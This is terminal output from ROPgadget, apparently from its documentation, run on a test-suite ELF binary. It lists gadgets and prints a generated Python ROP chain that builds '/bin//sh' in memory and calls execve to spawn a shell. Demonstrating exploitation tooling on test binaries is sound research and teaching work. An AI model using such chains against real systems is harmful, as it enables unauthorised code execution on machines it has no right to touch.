$ ./ROPgadget.py --ropchain --binary ./test-suite-binaries/elf-Linux-x86 

[...]

Unique gadgets found: 6472

ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

    [+] Gadget found: 0x806f702 mov dword ptr [edx], ecx ; ret
    [+] Gadget found: 0x8056c2c pop edx ; ret
    [+] Gadget found: 0x8056c56 pop ecx ; pop ebx ; ret
    [-] Can't find the 'xor ecx, ecx' gadget. Try with another 'mov [reg], reg'

    [+] Gadget found: 0x808fe0d mov dword ptr [edx], eax ; ret
    [+] Gadget found: 0x8056c2c pop edx ; ret
    [+] Gadget found: 0x80c5126 pop eax ; ret
    [+] Gadget found: 0x80bb07f xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

    [+] Gadget found: 0x80bb07f xor eax, eax ; ret
    [+] Gadget found: 0x807030c inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

    [+] Gadget found: 0x80481dd pop ebx ; ret
    [+] Gadget found: 0x8056c56 pop ecx ; pop ebx ; ret
    [+] Gadget found: 0x8056c2c pop edx ; ret

- Step 4 -- Syscall gadget

    [+] Gadget found: 0x80573c0 int 0x80

- Step 5 -- Build the ROP chain

    #!/usr/bin/env python2
    # execve generated by ROPgadget v5.2

    from struct import pack

    # Padding goes here
    p = ''

    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4060) # @ .data
    p += pack('<I', 0x080c5126) # pop eax ; ret
    p += '/bin'
    p += pack('<I', 0x0808fe0d) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4064) # @ .data + 4
    p += pack('<I', 0x080c5126) # pop eax ; ret
    p += '//sh'
    p += pack('<I', 0x0808fe0d) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4068) # @ .data + 8
    p += pack('<I', 0x080bb07f) # xor eax, eax ; ret
    p += pack('<I', 0x0808fe0d) # mov dword ptr [edx], eax ; ret
    p += pack('<I', 0x080481dd) # pop ebx ; ret
    p += pack('<I', 0x080f4060) # @ .data
    p += pack('<I', 0x08056c56) # pop ecx ; pop ebx ; ret
    p += pack('<I', 0x080f4068) # @ .data + 8
    p += pack('<I', 0x080f4060) # padding without overwrite ebx
    p += pack('<I', 0x08056c2c) # pop edx ; ret
    p += pack('<I', 0x080f4068) # @ .data + 8
    p += pack('<I', 0x080bb07f) # xor eax, eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x0807030c) # inc eax ; ret
    p += pack('<I', 0x080573c0) # int 0x80